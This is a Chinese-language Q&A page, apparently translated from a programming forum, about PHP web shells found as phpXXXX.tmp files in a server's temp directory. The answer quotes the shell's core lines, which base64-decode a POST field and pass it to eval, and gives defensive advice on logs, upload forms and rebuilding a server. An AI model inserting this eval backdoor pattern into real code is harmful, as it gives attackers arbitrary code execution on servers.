当前位置:  开发笔记 > 编程语言 > 正文

PHP代码包含在临时目录中的phpXXXX.tmp文件中

如何解决《PHP代码包含在临时目录中的phpXXXX.tmp文件中》经验,为你挑选了1个好方法。

我注意到我们的临时目录有许多看起来像临时文件的名字,如phpA3F9.tmp

查看内容我找到一个数字后跟一些PHP代码,以下代码出现在几个文件中

9990000    

这似乎是一次攻击尝试,但我认为它依赖于攻击者能够执行tmp文件夹中的代码.

谁能解释一下这里发生了什么?有什么风险?这些文件如何进入tmp文件夹?我怎么阻止他们?

我不知道它是否相关,但我们在IIS上运行PHP 5.5



1> samlev..:

简短说明:您的服务器可能已经被泄露.

这些是PHP shell - 它们大多无害,但是如果它们进入你的web根目录,它们将允许攻击者在你的服务器上执行任意代码.

理解shell的关键部分是:

$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");

它接受来自$_POST变量的任何代码base64_decode,然后eval在抑制任何错误的同时运行它.

它们可能通过您网站上的表单上传,并作为中间步骤转储到临时文件夹中,希望它们可以移动到可通过Web访问的位置.另一个选择是你的服务器上已经有一个shell或rootkit,并且它将这些文件放在它可以找到的任何可写文件夹中.

那该怎么办呢?检查您的服务器日志 - 如果您发现任何与您无法识别的脚本的成功连接,您可能会受到损害.查找您网站上的任何上传表单,并将其锁定(需要用户身份验证等),然后如果您确定自己已被入侵,请不要费心去清理它.启动新服务器,将干净的代码,重要文件和数据迁移到干净的服务器.

推荐阅读
周扒pi
这个屌丝很懒,什么也没留下!
DevBox开发工具箱 | 专业的在线开发工具网站    京公网安备 11010802040832号  |  京ICP备19059560号-6
Copyright © 1998 - 2020 DevBox.CN. All Rights Reserved devBox.cn 开发工具箱 版权所有